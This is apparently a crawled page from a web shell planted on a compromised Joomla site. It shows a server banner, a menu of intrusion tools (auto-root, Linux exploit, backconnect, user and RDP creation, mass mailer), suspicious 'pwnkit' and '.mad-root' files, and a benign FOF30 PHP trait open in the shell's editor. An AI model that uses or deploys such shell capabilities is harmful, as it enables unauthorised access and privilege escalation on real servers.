Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
libraries /
fof30 /
Model /
Mixin /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Assertions.php
1.57
KB
-rw----r--
DateManipulation.php
3.29
KB
-rw----r--
Generators.php
1.91
KB
-rw----r--
ImplodedArrays.php
1.1
KB
-rw----r--
JsonData.php
994
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ImplodedArrays.php
<?php /** * @package FOF * @copyright Copyright (c)2010-2019 Nicholas K. Dionysopoulos / Akeeba Ltd * @license GNU GPL version 2 or later */ namespace FOF30\Model\Mixin; defined('_JEXEC') or die; /** * Trait for dealing with imploded arrays, stored as comma-separated values */ trait ImplodedArrays { /** * Converts the loaded comma-separated list into an array * * @param string $value The comma-separated list * * @return array The exploded array */ protected function getAttributeForImplodedArray($value) { if (is_array($value)) { return $value; } if (empty($value)) { return array(); } $value = explode(',', $value); $value = array_map('trim', $value); return $value; } /** * Converts an array of values into a comma separated list * * @param array $value The array of values * * @return string The imploded comma-separated list */ protected function setAttributeForImplodedArray($value) { if (!is_array($value)) { return $value; } $value = array_map('trim', $value); $value = implode(',', $value); return $value; } }
Close